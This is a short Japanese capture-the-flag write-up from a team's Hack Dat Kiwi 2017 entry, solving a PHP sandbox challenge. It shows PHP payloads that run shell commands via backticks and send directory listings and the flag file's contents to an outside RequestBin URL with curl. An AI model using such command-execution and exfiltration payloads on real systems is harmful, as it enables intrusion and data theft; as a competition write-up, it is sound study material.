チーム Harekaze で Hack Dat Kiwi 2017 に参加しました。最終的にチームで 150 点を獲得し、順位は得点 307 チーム中 179 位でした。うち、私は 1 問を解いて 150 点を入れました。
以下、解いた問題の write-up です。
与えられた URL にアクセスすると、PHP のコードを入力するフォームが表示されました。
試しに以下のコードを入力してみると、Hello! と出力されました。
<?php echo 'Hello!';
以下のコードを入力してみると、今度は何も出力されませんでした。
<?php echo `ls`;
外部に出力を行うことでコマンドを実行した結果が得られないか、以下のコードを入力してみると flag.txt index.php php-emul sandbox.php というデータが https://requestb.in/xxxxxxxx に POST されました。
<?php
$res = `ls /var/www/html/`;
echo `curl https://requestb.in/xxxxxxxx -d "$res"`;
以下のコードを入力するとフラグが得られました。
<?php
$res = `cat /var/www/html/flag.txt`;
echo `curl https://requestb.in/xxxxxxxx -d "$res"`;
go-sandbox-yourself-with-a-kiwi